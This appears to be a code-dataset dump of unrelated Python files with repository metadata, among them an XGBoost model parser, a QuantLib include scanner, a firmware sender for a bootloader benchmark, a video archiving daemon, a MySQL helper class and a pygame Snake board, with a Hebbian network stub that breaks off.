match_leaf = self.LEAF_REGEX.search(line)
if match_leaf:
self.weight = float(match_leaf.groupdict().get('value'))
self.final = True
else:
self.weight = 0
self.final = False
match_branch = self.BRANCH_REGEX.search(line)
if match_branch:
self.cut_value = float(match_branch.groupdict().get('value'))
self.feature = match_branch.groupdict().get('feature')
if self.feature_index_dict:
self.feature_index = self.feature_index_dict[self.feature]
else:
feature_match = self.FEATURE_REGEX.search(self.feature)
if not feature_match:
raise ValueError(f'Feature {self.feature} needs to be '
'matched with its correct position in the feature '
'value vector. Please give a list of feature names'
' in the correct order with `--feature-names`.')
self.feature_index = feature_match.groupdict().get('id')
else:
self.cut_value = None
self.feature = None
self.feature_index = None
def get_feature_names(lines):
features = set()
for l in lines:
match_branch = XGBoostNode.BRANCH_REGEX.search(l)
if match_branch:
features.add(match_branch.groupdict().get('feature'))
return features
def parse_model(filename, feature_names):
trees = []
with open(filename, 'r') as f:
lines = f.readlines()
# build the feature name dict if neccessary
if feature_names:
# check that the feature names are in line with the names found in
# the tree
if not set(feature_names) >= get_feature_names(lines):
raise ValueError('The given feature names do not properly describe'
'the features found in the model. Please check that your '
'argument for `--feature-names` is a proper superset of the '
'feature names used in the model.\nThese features have been '
f'found in the model:\n{" ".join(get_feature_names(lines))}')
feature_index_dict = {name: i for i, name in enumerate(feature_names)}
else:
feature_index_dict = None
node = None
for i, line in enumerate(lines):
# save finished tree
if line.startswith('booster'):
if node:
trees.append(node.root)
node = None
continue
# start a new tree
if node is None:
node = XGBoostNode(line=line, feature_index_dict=feature_index_dict)
continue
# move upwards if a leaf is reached
while node.final or (node.parent and node.left and node.right):
node = node.parent
# fill left and right leaf
if not node.left:
node.left = XGBoostNode(parent=node, line=line)
node = node.left
continue
if not node.right:
node.right = XGBoostNode(parent=node, line=line)
node = node.right
continue
trees.append(node.root)
return trees
| 1.84375 | 2 |
1005.py | TheLurkingCat/TIOJ | 1 | 27140 | <filename>1005.py
from itertools import combinations
from math import gcd, sqrt
a = int(input())
while a:
s = set()
total = 0
coprime = 0
for _ in range(a):
s.add(int(input()))
for (x, y) in combinations(list(s), 2):
total += 1
if gcd(x, y) == 1:
coprime += 1
try:
print('{:.6f}'.format(sqrt(6 * total / coprime)))
except ZeroDivisionError:
print('No estimate for this data set.')
a = int(input())
| 2.328125 | 2 |
dev_tools/scan_inclusions.py | frannuca/quantlib | 0 | 27268 | import os, sys, re, string
import xml.dom.minidom
import xml.dom.ext
QL_ROOT = "C:/Projects/QuantLibSVN/trunk/"
VC8 = "C:/Program Files/Microsoft Visual Studio 8/"
BOOST = "C:/Boost/boost_1_33_1/"
QL = QL_ROOT +"QuantLib/"
QL_ADDIN = QL_ROOT + "QuantLibAddin/"
OBJECT_HANDLER = QL_ROOT + "ObjectHandler/"
QL_XL = QL_ROOT + "QuantLibXL/"
STD = VC8 + "VC/include/"
SDK = VC8 + "VC/PlatformSDK/Include"
INCLUDE_PATH = [QL, QL_ADDIN, OBJECT_HANDLER, QL_XL, BOOST, STD, SDK]
PREFIX_PATH = ["ql", "qlo", "oh", "boost", "qlxl", "ohxl", "xlsdk"]
class MyError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def searchAndParseHeaderFile(fileName):
for includePath in INCLUDE_PATH:
filePath = includePath + fileName[0].lower() + fileName[1:]
if os.path.isfile(filePath):
return parseHeaderFile(filePath)
filePath = includePath + fileName[0].upper() + fileName[1:]
if os.path.isfile(filePath):
return parseHeaderFile(filePath)
raise MyError("searchAndParseHeaderFile: " + fileName + " not found")
def getFilePrefix(include):
for prefix in PREFIX_PATH:
if re.match(prefix + '/.*',include):
return prefix
return "std"
def parseHeaderFile(filePath):
includes = []
nbLines = 0
f=open(filePath)
for line in f:
nbLines +=1
if not re.match("//", line):
includesLines = re.findall('^#include.*<.*>', line)
if includesLines:
includeName = re.findall('<.*>', includesLines[0])[0][1:-1]
includes.append(includeName)
f.close()
return includes, nbLines
def walkThroughIncludesFiles(fileName, files, filesCounters, node, document):
new = document.createElement('header')
node.appendChild(new)
parsingResults = searchAndParseHeaderFile(fileName)
includes = parsingResults[0]
attribute = "%i" % parsingResults[1]
new.setAttribute('nbLines', attribute)
nbLines = parsingResults[1]
for include in includes:
#if the son is not recorded yet we explore it
include = "%s" % include
if not files.count(include) > 0:
files.append(include)
try:
prefix = getFilePrefix(include)
filesCounters[prefix][0] +=1
result = walkThroughIncludesFiles(include, files, filesCounters, new, document)
nbLines += result[0]
filesCounters[prefix][1] += result[1]
except MyError, e:
print e.value, " in : " + fileName
attribute = "%i" % nbLines
new.setAttribute('total', attribute)
new.setAttribute('name', fileName)
return int(nbLines), parsingResults[1]
def trackDependencies(fileName):
document = xml.dom.minidom.Document()
filesCounters = {}
filesCounters["boost"] = [0,0]
filesCounters["ql"] = [0,0]
filesCounters["qlo"] = [0,0]
filesCounters["qlxl"] = [0,0]
filesCounters["oh"] = [0,0]
filesCounters["ohxl"] = [0,0]
filesCounters["xlsdk"] = [0,0]
filesCounters["std"] = [0,0]
files = []
files.append(fileName)
nbLines = walkThroughIncludesFiles(fileName, files, filesCounters, document, document)
return filesCounters, document, nbLines, files
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'Give the relative path of the file you want to scan (wrt to the included folders)'
sys.exit()
args = sys.argv[1:]
fileName = args[0]
result = trackDependencies(fileName)
nbLinesParsed = result[2][0]
print "number of files parsed ", len(result[3])
print "number of lines parsed ", nbLinesParsed
namespaces = result[0]
for namespace in namespaces:
print namespace, ":\tnb Files ", namespaces[namespace][0]
print "\tnb lines ", namespaces[namespace][1]
print "\t%(nbLines)02d" % {'nbLines': float(namespaces[namespace][1])/nbLinesParsed * 100}, "%"
outputName = fileName.replace("/", "-") + ".xml"
output = "./" + outputName
f=open(output, 'w')
xml.dom.ext.PrettyPrint(result[1], f)
f.close()
print "result saved in ", outputName
| 1.484375 | 1 |
erpnext/utilities/__init__.py | nagendrarawat/erpnext_custom | 2 | 27396 | ## temp utility
from __future__ import print_function
import frappe
from erpnext.utilities.activation import get_level
from frappe.utils import cstr
def update_doctypes():
for d in frappe.db.sql("""select df.parent, df.fieldname
from tabDocField df, tabDocType dt where df.fieldname
like "%description%" and df.parent = dt.name and dt.istable = 1""", as_dict=1):
dt = frappe.get_doc("DocType", d.parent)
for f in dt.fields:
if f.fieldname == d.fieldname and f.fieldtype in ("Text", "Small Text"):
print(f.parent, f.fieldname)
f.fieldtype = "Text Editor"
dt.save()
break
def get_site_info(site_info):
# called via hook
company = frappe.db.get_single_value('Global Defaults', 'default_company')
domain = None
if not company:
company = frappe.db.sql('select name from `tabCompany` order by creation asc')
company = company[0][0] if company else None
if company:
domain = frappe.db.get_value('Company', cstr(company), 'domain')
return {
'company': company,
'domain': domain,
'activation': get_level()
}
| 1.46875 | 1 |
timemachines/skaters/orbt/orbitlgtskaterfactory.py | iklasky/timemachines | 253 | 27524 |
from timemachines.skaters.orbt.orbitinclusion import using_orbit
if using_orbit:
from timemachines.skaters.orbt.orbitwrappers import orbit_lgt_iskater
from timemachines.skatertools.utilities.conventions import Y_TYPE, A_TYPE, R_TYPE, E_TYPE, T_TYPE
from timemachines.skatertools.batch.batchskater import batch_skater_factory
def orbit_lgt_skater_factory(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None,
emp_mass=0.0,
seasonality=None):
return batch_skater_factory(y=y, s=s, k=k, a=a, t=t, e=e, r=r, emp_mass=emp_mass,
iskater=orbit_lgt_iskater,
iskater_kwargs={'seasonality': seasonality},
min_e=0, n_warm=20)
def orbit_lgt_12(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y=y, s=s, k=k, a=a,t=t,e=e, seasonality=12)
def orbit_lgt_24(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y, s, k, a=a,t=t,e=e, seasonality=24)
| 1.390625 | 1 |
benchmarks/secure_data_SDK-benchmarks/bootloader/load_firmware.py | ghsecuritylab/BenchIoT | 22 | 27652 |
from struct import pack, unpack
import binascii
import socket
HOST = '192.168.0.10'
PORT = 1337
BUFF_SIZE = 1024
START_TOKEN = "init"
DONE_TOKEN = "<PASSWORD>"
FAIL_TOKEN = "<PASSWORD>"
def create_test_application(load_addr=0x08002000, size=64*1024):
'''
Creates a test application that simply returns to the bootloader.
Creates and ISR Table that point to a infinte loop, except reset
vector that points to two instructions
' mov sp, r3'
' bx lr'
'''
SP_ADDR = 0x20050000 # Address of stack for loaded application
fw_list = []
fw_list.append(pack("<I",SP_ADDR))
fw_list.append(pack("<I",load_addr+1025))
# build rest of ISR
for isr in xrange(2,256):
fw_list.append(pack("<I",load_addr+1029)) # 4 bytes after end of ISR
# Add Code
fw_list.append('\x9d\x46\x70\x47') # mov sp,r3; bx lr
fw_list.append('\xfe\xbf\xff\xf7') # b.w
# Fill rest with garbage
i = 0
#TODO when bootloader does check sum update to be random data
while (len(fw_list)< size / 4):
fw_list.append(pack("<I",i))
i += 1
return ''.join(fw_list)
def tx(filename):
with open(filename,'rb') as fw_file:
fw_data = fw_file.read()
tx_data(fw_data)
def tx_data(fw_data):
client = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(50)
client.connect(( HOST, PORT ))
client.settimeout(None)
print "Sending Start Token:", START_TOKEN
client.send(START_TOKEN)
data = client.recv(len(START_TOKEN))
if data and data == START_TOKEN:
print "Got Start Token:", data
client.send(pack("<I", len(fw_data)))
print "Sent Length: ", len(fw_data)
print "Sending FW: ", len(fw_data)
for i in xrange(0,len(fw_data), 128):
client.send(fw_data[i:i+128])
data = client.recv(len(DONE_TOKEN))
if data and data == DONE_TOKEN:
print "Sent Successfully, Token: ", data
else:
print "Transmission Failed, Token: ", data
def rx():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', PORT))
s.listen(1)
conn, addr = s.accept()
print 'Connection address:', addr
data = conn.recv(5)
print data
if (data and data == START_TOKEN):
conn.send(START_TOKEN)
data = conn.recv(4)
size = unpack('<I', data)[0]
print "Size: ",size
received_count = 0
with open("outfile.bin",'wb') as outfile:
while (received_count < size):
request = size - received_count
if request > BUFF_SIZE:
request = BUFF_SIZE
data = conn.recv(request)
if (data):
received_count += len(data)
print "Received %i: %s..."% (len(data),
binascii.hexlify(data[0:10]))
outfile.write(data)
else:
print ("Failed")
conn.send(FAIL_TOKEN)
conn.close()
return
conn.send(DONE_TOKEN) # echo
print "Done"
else:
conn.send(FAIL_TOKEN)
conn.close()
if __name__ == "__main__":
from argparse import ArgumentParser
arg_parser = ArgumentParser()
arg_parser.add_argument('-f','--filename',metavar="FILE",
help='Firmware file to transmit (use ' + \
'arm-none-eabi-objcopy -O binary <file.elf> <outfile>)')
arg_parser.add_argument('--start_addr', default=0x08020000, type=int,
help='Start Address for generated test firmware')
arg_parser.add_argument('--size', default=16*1024, type=int,
help='Size of generated firmware to transmit')
args = arg_parser.parse_args()
#
if args.filename:
tx(args.filename)
else:
fw_data = create_test_application(args.start_addr, args.size)
with open('gen_fw.bin', 'wb') as outfile:
outfile.write(fw_data)
tx_data(fw_data)
| 1.75 | 2 |
Problemset/rotate-array/rotate-array.py | KivenCkl/LeetCode | 7 | 27780 |
# @Title: 旋转数组 (Rotate Array)
# @Author: KivenC
# @Date: 2019-03-14 16:57:56
# @Runtime: 124 ms
# @Memory: 13.4 MB
class Solution:
def rotate(self, nums: List[int], k: int) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
'''
k = k % len(nums)
while k > 0:
num = nums.pop()
nums.insert(0, num)
k -= 1
'''
k = k % len(nums)
if k > 0:
nums.reverse()
nums[:k] = reversed(nums[:k])
nums[k:] = reversed(nums[k:])
| 2.171875 | 2 |
script/sklearn_like_toolkit/warpper/wrapperGridSearchCV.py | demetoir/MLtools | 0 | 27908 | <reponame>demetoir/MLtools<gh_stars>0
from sklearn import model_selection
from sklearn.externals.joblib import Parallel
from tqdm import tqdm
from script.sklearn_like_toolkit.warpper.base.MixIn import ClfWrapperMixIn, MetaBaseWrapperClfWithABC
import multiprocessing
CPU_COUNT = multiprocessing.cpu_count()
# TODO using packtools.grid_search GridSearchCVProgressBar make warning ...
# but copied code just work fine, wtf??
# from pactools.grid_search import GridSearchCVProgressBar as _GridSearchCVProgressBar
class GridSearchCVProgressBar(model_selection.GridSearchCV):
"""Monkey patch Parallel to have a progress bar during grid search"""
def _get_param_iterator(self):
"""Return ParameterGrid instance for the given param_grid"""
iterator = super(GridSearchCVProgressBar, self)._get_param_iterator()
iterator = list(iterator)
n_candidates = len(iterator)
cv = model_selection._split.check_cv(self.cv, None)
n_splits = getattr(cv, 'n_splits', 3)
max_value = n_candidates * n_splits
class ParallelProgressBar(Parallel):
def __call__(self, iterable):
bar = tqdm(max_value=max_value, title='GridSearchCV')
bar.iterable = iterable
# iterable = bar(iterable)
return super(ParallelProgressBar, self).__call__(iterable)
# Monkey patch
model_selection._search.Parallel = ParallelProgressBar
return iterator
class wrapperGridSearchCV(GridSearchCVProgressBar, ClfWrapperMixIn, metaclass=MetaBaseWrapperClfWithABC):
def __init__(self, estimator, param_grid, scoring=None, fit_params=None, n_jobs=CPU_COUNT, iid=True, refit=True,
cv=None, verbose=0, pre_dispatch='2*n_jobs', error_score='raise', return_train_score="warn"):
GridSearchCVProgressBar.__init__(
self, estimator, param_grid, scoring, fit_params, n_jobs, iid, refit, cv, verbose, pre_dispatch,
error_score, return_train_score)
ClfWrapperMixIn.__init__(self)
| 1.53125 | 2 |
models/__init__.py | dudtjakdl/OpenNMT-Korean-To-English | 1,491 | 28036 | from .EncoderRNN import EncoderRNN
from .DecoderRNN import DecoderRNN
from .TopKDecoder import TopKDecoder
from .seq2seq import Seq2seq
| 0.451172 | 0 |
videoarchiver.py | yannisHD/StreamRecorder | 0 | 28164 | <reponame>yannisHD/StreamRecorder
#!/usr/bin/python
"""A concise tool for archiving video as it is recorded.
"""
import os, time, argparse
import subprocess32 as subprocess
from socket import gethostname
import dvrutils
def read_archive_config(fName):
with open(fName, 'r') as f:
flines = f.readlines()
streams = [] # [{'StreamName': <name>, 'VideoPath': <path>, 'ArchivePath': <path>},...]
for line in flines:
if line[0] != '#': # ignore comment lines
sName = line.split('#')[0].strip() if '#' in line else line.strip()
if len(sName) > 0:
streams.append({'StreamName': sName, 'VideoPath': '', 'ArchivePath': ''})
return streams
class StreamArchiver:
def __init__(self, logger, dvrName, streamListFile='videoarchiver.cfg', storagePath='/mnt/video', archivePath='/mnt/archive'):
self.logger = logger
self.dvrName = dvrName
self.streamListFile = os.path.join(archivePath,streamListFile)
self.storagePath = storagePath
self.archivePath = archivePath
if os.path.exists(self.streamListFile):
self.streams = read_archive_config(self.streamListFile)
self.check_directories()
else:
self.logger.error("The specified configuration file {} cannot be found!".format(self.streamListFile))
def check_directories(self):
# check which streams this computer has and make sure the directories are set up right
goodStreams = []
for s in self.streams:
s['VideoPath'] = os.path.join(self.storagePath,s['StreamName'])
if os.path.isdir(s['VideoPath']): # if we have this stream
#s['ArchivePath'] = os.path.join(self.archivePath,s['StreamName'])
s['ArchivePath'] = self.archivePath
if not os.path.isdir(s['ArchivePath']): # if the stream has no directory in the archive, then make it
if os.path.exists(s['ArchivePath']):
s['ArchivePath'] = dvrutils.get_unique_filename(s['ArchivePath'],nZeros=0) # if there is a file with the same name for whatever reason, change the directory name
os.makedirs(s['ArchivePath'])
if self.logger is not None:
self.logger.info('Created directory {} for stream {}!'.format(s['ArchivePath'],s['StreamName']))
goodStreams.append(s)
else: # if we don't, give a debug message for the user
if self.logger is not None:
self.logger.debug("Ignoring stream {} as it does not exist on this system.".format(s['StreamName']))
self.streams = goodStreams
def sync_streams(self):
# sync the streams one at a time to minimize fragmentation (NOTE: Eventually this will be pull-based, so there will be no fragmentation)
for s in self.streams:
# use rsync to perform the copy
syncCmd = ['rsync', '-rlptg', s['VideoPath'], s['ArchivePath']] # r = recurse; l = symlinks as symlinks; preserve: p = permissions, t = modification times, g = group
if self.logger is not None:
self.logger.info("Syncing video for stream {} in {} to archive at {}...".format(s['StreamName'], s['VideoPath'], s['ArchivePath']))
self.logger.debug("Syncing with the command: {}".format(syncCmd))
startTime = time.time()
subprocess.call(syncCmd)
elapsedTime = time.time() - startTime
if self.logger is not None:
self.logger.info("Sync for stream {} took {} seconds.".format(s['StreamName'], elapsedTime))
def start_sync_daemon(self, timeOfDay='1:00'):
# repeatedly sync streams on a schedule as determined by the timeOfDay parameter
# timeOfDay is a time string in HH:MM format
# by default it will sync at 1:00 AM every day
try:
syncHour, syncMin = [int(t) for t in timeOfDay.split(':')]
except:
syncHour, syncMin = 1, 0 # use default if the user input an incorrect time string
self.logger.warning("Invalid time string: '{}'! Reverting to default! This is probably not what you wanted!".format(timeOfDay))
self.logger.info("Going to sync daily at {}:{}".format(syncHour, syncMin))
self.syncHistory = {int(time.strftime('%Y%m%d')): False} # save a log to know if we have synced today or not
while True:
dayKey = int(time.strftime('%Y%m%d'))
if dayKey not in self.syncHistory: # if this is a new day, put an entry in the log so we know that it's a new day and we need to watch for the sync time
self.syncHistory.update({dayKey: False})
if not self.syncHistory[dayKey]: # if we haven't synced yet today, check the time to see if we should
currTime = time.localtime()
syncNow = False
if currTime.tm_hour > syncHour:
syncNow = True
elif currTime.tm_hour == syncHour and currTime.tm_min >= syncMin:
syncNow = True
if syncNow: # if we should, sync files and log the event
self.sync_streams()
self.syncHistory[dayKey] = True
# if we already synced today, we don't need to do anything
time.sleep(5)
if __name__ == "__main__":
# parse any arguments passed in
parser = argparse.ArgumentParser(prog='videoarchiver.py', usage='%(prog)s [configFilename]', description='Archives/backs up video from predefined camera streams to a defined location.')
parser.add_argument('streamListFile', help = '(Optional) Name of the configuration file to defining streams to backup (defaults to archivePath/dvrName).')
parser.add_argument('-t', '--time-of-day', dest = 'timeOfDay', default = '1:00', help = '(Optional) Time of day to perform the backup (HH:MM, 24-hour format) (default: %(default)s).')
parser.add_argument('-l', '--log-file', dest = 'logFilename', default = 'videoarchiver.cfg', help = '(Optional) Name of the file for logging (default: %(default)s).')
parser.add_argument('-v', '--loglevel', dest = 'loglevel', default = 'INFO', help = '(Optional) streamrecorder log level (does not affect FFMPEG log level). Specify numeric values (10, 20, 30, etc.) or strings like DEBUG or WARNING')
parser.add_argument('-s', '--storage-path', dest = 'storagePath', default = '/mnt/video', help = '(Optional) Location of the archive directory (default: %(default)s).')
parser.add_argument('-a', '--archive-path', dest = 'archivePath', default = '/mnt/archive', help = '(Optional) Location of the archive directory (default: %(default)s).')
parser.add_argument('-d', '--dvr-name', dest = 'dvrName', default = gethostname(), help = '(Optional) Name of the computer recording the stream (defaults to hostname: %(default)s).')
args = parser.parse_args()
# setup logging
logFilePath = os.path.join(args.archivePath, "{}.log".format(args.dvrName)) if args.logFilename is None else args.logFilename # by default, log to file: archivePath/dvrName.log
logger = dvrutils.setup_logging(logFilePath, args.loglevel, args.dvrName, logToFile=True, logToStdout=True) # this function will output the loglevel for verification
try:
# create the archiver object, which makes sure things are set up correctly
streamArchiver = StreamArchiver(logger, args.dvrName, args.streamListFile, args.storagePath, args.archivePath)
# start the daemon
streamArchiver.start_sync_daemon(args.timeOfDay)
except:
# if there was a crash, log it
# TODO: send an email alert (once it works)
logger.error("The program crashed unexpectedly!")
| 2.078125 | 2 |
src/test.py | chatdip98/Acoustic-Scene-Classification | 0 | 28292 | #------testing the trained model and ensemble weights on the test data to get the final accuracy
#importing required libraries and modules
import os
import sys
import cv2
import numpy as np
from preprocess import Preprocess
from data_split import Load
from conv_net import CNN
from ensemble import Ensemble
def load_numpy_data(arg, folder):
#loading the numpy data (.npy files) from the required directory
X_test = list(np.load('bin/'+folder+'/'+arg+'/X_test.npy'))
Y_test = list(np.load('bin/'+folder+'/'+arg+'/Y_test.npy'))
X_test = list(np.array(X_test).reshape(-1, 128, 431))
Y_test = list(np.array(Y_test).reshape(-1, 15))
return X_test, Y_test
def predict_test(arg, X_train, X_val, X_test, Y_train, Y_val, Y_test):
#loading the model and training its corresponding SVR classifier
data_size = 'full'
neural_net = CNN()
model = neural_net.create_1ConvModel()
model.load('DNN/'+data_size+'/'+arg+'.model')
#defining an ensemble class and training the SVR for the particular classifier
en = Ensemble()
en.regressor(arg, model, X_val[0], Y_val[0])
neural_net.predict_test_data(arg, model, X_test[0], Y_test[0])
if __name__ == '__main__':
feature = ['mono', 'left', 'right', 'mid', 'side', 'harmonic', 'percussive', 'mfcc'] #all the features used in the architecture
X_test = [0 for i in range(len(feature))]
Y_test = [0 for i in range(len(feature))]
for i in range(8):
X_test[i], Y_test[i] = load_numpy_data(feature[i], 'full')
en = Ensemble()
#uncomment whichever method you want to use in your ensemble(SVR or majority voting)
acc = en.result_SVR(X_test, Y_test)
#acc = en.result_majority_voting(X_test, Y_test)
print("Ensemble Test Accuracy =", acc, '%')
| 2 | 2 |
common/sqlmanager.py | ntcat/tilde | 1 | 28420 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'shen.bas'
__time__ = '2018-01-26'
"""
import pymysql
class SQLManager:
def __init__(self, dbCnfig):
self.DB_CONFIG = dbCnfig
self.conn = None
self.cursor = None
self.msg = ''
self.affect_rows = 0
if not self.connect():
exit() #连接失败,退出
def connect(self):
try:
if len(self.DB_CONFIG) == 0:
self.msg = '数据库连接串为空,检查server、conn标签参数。\n'
return False
else:
self.conn = pymysql.connect(host=self.DB_CONFIG['host'],
port=int(self.DB_CONFIG['port']),
user=self.DB_CONFIG['user'],
passwd=self.DB_CONFIG['passwd'],
db=self.DB_CONFIG['db'],
charset=self.DB_CONFIG['charset'])
self.cursor = self.conn.cursor(cursor=pymysql.cursors.DictCursor)
return True
except Exception as e:
print('\nmysql connect failed:\n',str(e))
return False
# 查询多条数据
def get_list(self, sql, args=None):
self.cursor.execute(sql, args)
result = self.cursor.fetchall()
return result
# 查询单条数据
def get_one(self, sql, args=None):
try:
self.cursor.execute(sql, args)
result = self.cursor.fetchone()
return result
except Exception as e:
self.msg = str(e)
return False
# 执行单条SQL语句
def modify(self, sql, args=None):
self.cursor.execute(sql, args)
self.rows_affected = self.cursor.rowcount
self.conn.commit()
# 创建单条记录的语句
def create(self, sql, args=None):
self.cursor.execute(sql, args)
self.conn.commit()
last_id = self.cursor.lastrowid
return last_id
# 关闭数据库cursor和连接
def close(self):
self.cursor.close()
self.conn.close()
# 进入with语句自动执行
def __enter__(self):
return self
# 退出with语句块自动执行
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| 2.09375 | 2 |
resilient-circuits/resilient_circuits/__init__.py | COLDTURNIP/resilient-python-api | 28 | 28548 | <gh_stars>10-100
# (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
import pkg_resources
try:
__version__ = pkg_resources.get_distribution(__name__).version
except pkg_resources.DistributionNotFound:
__version__ = None
from .actions_component import ResilientComponent
from .action_message import ActionMessageBase, ActionMessage, \
FunctionMessage, FunctionResult, FunctionError, \
StatusMessage, BaseFunctionError
from .decorators import function, inbound_app, app_function, handler, required_field, required_action_field, defer, debounce
from .actions_test_component import SubmitTestAction, SubmitTestFunction, SubmitTestInboundApp
from .app_function_component import AppFunctionComponent
| 0.996094 | 1 |
game/Tableros.py | GeinerGV/TS1_ProyectoFinal | 0 | 28676 | <gh_stars>0
from pygame import sprite, surface, Color
from game.Bloques import CeldasTablero
from game.Snake import Snake
class AreaTablero(sprite.Sprite):
def __init__(self, size, pos, bgcolor, estructura = None):
sprite.Sprite.__init__(self)
self.image = surface.Surface(size)
self.image.fill(Color(bgcolor))
self.rect = self.image.get_rect()
self.rect.move_ip(pos)
self.tableroCnt = TableroCnt()
tablero = Tablero([42, 48], size, estructura)
self.tableroCnt.add(tablero)
# self.tableroCnt.add(Snake(tablero, 0, pos=(3,0)))
self.tableroCnt.draw(self.image)
# print(sprite.groupcollide(tablero.celdas.filas[2], tablero.celdas.columnas[3], False, False))
self.actualizar = False
def update(self, *args):
self.tableroCnt.update(*args)
class TableroCnt(sprite.GroupSingle):
pass
class Tablero(sprite.Sprite):
def __init__(self, rangoCelda, maxSize, estructura = dict()):
sprite.Sprite.__init__(self)
self.rangeSize = (rangoCelda[0], rangoCelda[1])
self.sizeCelda = self.rangeSize[0]
self.dimension = (int(maxSize[0]/self.sizeCelda), int(maxSize[1]/self.sizeCelda))
color = estructura["color"] if "color" in estructura else dict()
bgcolor = color.pop("0") if len(color) and "0" in color else "gray"
self.celdas = CeldasTablero(self.sizeCelda, self.dimension, colors=color, estructura=estructura["celdas"] if "celdas" in estructura else None)
del color
sizeSurf = tuple(map(lambda val: val*self.sizeCelda, self.dimension))
self.image = surface.Surface(sizeSurf)
self.image.fill(Color(bgcolor))
del sizeSurf, bgcolor
self.celdas.draw(self.image)
self.rect = self.image.get_rect()
self.rect.center = (int(maxSize[0]/2), int(maxSize[1]/2))
# Draw Serpiente
self.snake = Snake(self, 0, pos=(5,5), velocidad=estructura["vel"] if "vel" in estructura else None)
self.snake.draw(self.image)
def update(self, *args):
self.snake.update(*args) | 2.515625 | 3 |
test_project/test_app/urls.py | ninemoreminutes/django-trails | 2 | 28804 | <reponame>ninemoreminutes/django-trails<filename>test_project/test_app/urls.py<gh_stars>1-10
# Django
from django.urls import re_path
# Test App
from .views import index
urlpatterns = [
re_path(r'^$', index, name='index'),
]
| 1.054688 | 1 |
prototype/ukwa/lib/sip/ids.py | GilHoggarth/ukwa-manage | 1 | 28932 | <reponame>GilHoggarth/ukwa-manage<gh_stars>1-10
#!/usr/bin/env python
"""
Generic methods used for verifying/indexing SIPs.
"""
from __future__ import absolute_import
import re
import logging
import tarfile
import hdfs
from lxml import etree
from StringIO import StringIO
# import the Celery app context
#from crawl.celery import app
#from crawl.celery import cfg
HDFS_URL='http://hdfs:14000'
HDFS_USER='hdfs'
SIP_ROOT="/heritrix/sips/2015-domain-crawl"
NS={"mets": "http://www.loc.gov/METS/", "premis": "info:lc/xmlns/premis-v2"}
XLINK="{http://www.w3.org/1999/xlink}"
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(asctime)s] %(levelname)s %(filename)s.%(funcName)s: %(message)s")
handler.setFormatter(formatter)
# attach to root logger
logging.root.addHandler(handler)
logging.root.setLevel(logging.INFO)
logger = logging.getLogger(__name__)
logger.setLevel( logging.INFO )
logger.info("INFO LOGGING ENABLED")
logger.debug("DEBUG LOGGING ENABLED")
def get_warc_identifiers(sip):
for item in get_all_identifiers(sip):
if item['mimetype'] == "application/warc":
yield item
def get_all_identifiers(sip):
"""Parses the SIP in HDFS and retrieves FILE/ARK tuples."""
# client = hdfs.InsecureClient(cfg.get('hdfs', 'url'), user=cfg.get('hdfs', 'user'))
client = hdfs.InsecureClient(HDFS_URL, HDFS_USER)
tar = "%s/%s.tar.gz" % (SIP_ROOT, sip)
status = client.status(tar,strict=False)
if status:
# Catch empty packages:
if status['length'] == 0:
logger.warning("Empty (zero byte) SIP package: %s" % tar)
yield None
else:
with client.read(tar) as reader:
t = reader.read()
# Open the package:
tar = tarfile.open(mode="r:gz", fileobj=StringIO(t))
foundMets = False
for i in tar.getmembers():
logger.debug("Examining %s" % i.name)
if i.name.endswith(".xml"):
foundMets = True
xml = tar.extractfile(i).read()
try:
tree = etree.fromstring(xml)
files = {}
n_files = 0
for mfile in tree.xpath("//mets:file", namespaces=NS):
#logger.debug("Found mets:file = %s " % etree.tostring(mfile))
admid = mfile.attrib["ADMID"]
logger.info("Found mets:file admid = %s " % admid)
path = mfile.xpath("mets:FLocat", namespaces=NS)[0].attrib["%shref" % XLINK]
files[admid] = { "path": path, "mimetype": mfile.attrib["MIMETYPE"], "size": mfile.attrib["SIZE"],
"checksum_type": mfile.attrib["CHECKSUMTYPE"], "checksum": mfile.attrib["CHECKSUM"] }
n_files = n_files + 1
if len(files.keys()) != n_files:
logger.error("ERROR, more files than IDs")
n_amdsecs = 0
for amdsec in tree.xpath("//mets:amdSec", namespaces=NS):
#logger.debug("Found mets:amdSec = %s " % etree.tostring(amdsec))
admid = amdsec.attrib["ID"]
logger.info("Found mets:amdSec id = %s " % admid)
oiv = amdsec.xpath("mets:digiprovMD/mets:mdWrap/mets:xmlData/premis:object/premis:objectIdentifier/premis:objectIdentifierValue", namespaces=NS)
if oiv and len(oiv) == 1:
files[admid]['ark'] = oiv[0].text
n_amdsecs = n_amdsecs + 1
logger.debug("Yielding %s" % files[admid] )
yield files[admid]
else:
logger.info("Skipping amdSec ID=%s" % admid)
if n_files != n_amdsecs:
logger.error("ERROR finding all amdSec elements")
except IndexError as i:
logger.error("Problem parsing METS for SIP: %s" % sip)
logger.exception(i)
if not foundMets:
logger.error("No METS XML file found!")
else:
logger.warning("Could not find SIP: hdfs://%s" % tar)
def find_identifiers(output_file):
with open(output_file, 'w') as f:
# client = hdfs.InsecureClient(cfg.get('hdfs', 'url'), user=cfg.get('hdfs', 'user'))
client = hdfs.InsecureClient(HDFS_URL, HDFS_USER)
for (path, dirs, files) in client.walk(SIP_ROOT):
logger.info("Looking at path "+path)
for file in files:
logger.info("Looking at file " + file)
if file.endswith('.tar.gz'):
sip = "%s/%s" % (path, file)
sip = sip[len(SIP_ROOT) + 1:]
sip = sip[:-7]
logger.info("Scanning %s..." % sip)
for waid in get_all_identifiers(sip):
f.write("%s %s\n" % (sip, waid) )
def main():
find_identifiers('identifiers.txt')
# Test
#for waid in get_all_identifiers("weekly-wed2300/20141210230151"):
# print(waid)
#sys.exit(0)
if __name__ == "__main__":
main()
| 1.578125 | 2 |
hebbmodel/fc.py | aimir-lab/hebbian-learning-cnn | 18 | 29060 | <reponame>aimir-lab/hebbian-learning-cnn
import torch.nn as nn
import params as P
import hebbmodel.hebb as H
class Net(nn.Module):
# Layer names
